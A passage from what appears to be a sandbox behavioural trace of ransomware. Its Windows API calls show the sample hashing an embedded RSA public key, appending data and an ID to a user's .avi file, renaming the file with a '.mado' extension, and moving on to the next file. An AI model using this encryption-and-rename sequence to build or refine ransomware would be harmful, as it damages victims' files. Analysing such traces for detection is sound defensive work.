KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.090] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321848) returned 1 [0206.091] CryptCreateHash (in: hProv=0x321848, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.091] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.091] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.091] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.091] GetLastError () returned 0x0 [0206.091] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.091] CryptReleaseContext (hProv=0x321848, dwFlags=0x0) returned 1 [0206.091] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.091] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.091] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.092] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.092] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x96e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.092] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.092] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.092] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.092] CloseHandle (hObject=0x63c) returned 1 [0206.093] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\-JraqL9GjCG5I.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\kmoxx\\-jraql9gjcg5i.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\-JraqL9GjCG5I.avi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\kmoxx\\-jraql9gjcg5i.avi.mado")) returned 1 [0206.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.094] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.095] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcd158f0, ftCreationTime.dwHighDateTime=0x1d5dce0, ftLastAccessTime.dwLowDateTime=0x97fa9dc0, ftLastAccessTime.dwHighDateTime=0x1d5da3a, ftLastWriteTime.dwLowDateTime=0x97fa9dc0, ftLastWriteTime.dwHighDateTime=0x1d5da3a, nFileSizeHigh=0x0, nFileSizeLow=0x755a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2YNwDAh.avi", cAlternateFileName="")) returned 1 [0206.095] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\2YNwDAh.avi") returned=".avi" [0206.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\2YNwDAh.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\kmoxx\\2ynwdah.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.096] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=30042) returned 1 [0206.096] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.098] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7534, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.098] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.100] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x755a, lpOverlapped=0x0) returned 1 [0206.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.101] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321848) returned 1 [0206.102] CryptCreateHash (in: hProv=0x321848, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.102] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.102] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.102] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.102] GetLastError () returned 0x0 [0206.102] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.102] CryptReleaseContext (hProv=0x321848, dwFlags=0x0) returned 1 [0206.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.103] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.103] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.103] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7560) returned 0x3b81690 [0206.103] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66df8 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799f8 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66e40 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a28 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a58 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0206.103] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a58 | out: hHeap=0x2c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79aa0 | out: hHeap=0x2c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79a70 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79a58 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72b80 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72c98 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a58 | out: hHeap=0x2c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79aa0 | out: hHeap=0x2c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.105] GetCurrentThreadId () returned 0x600 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff478 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.105] GetCurrentThreadId () returned 0x600 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0206.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a58 [0206.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a40 [0206.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ab8 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a88 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ad0 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a58 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a58 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79aa0 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ad0 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72db0 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72ec8 [0206.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a58 | out: hHeap=0x2c0000) returned 1 [0206.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0206.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321848 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a88 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a40 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0206.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a28 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66e40 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.109] 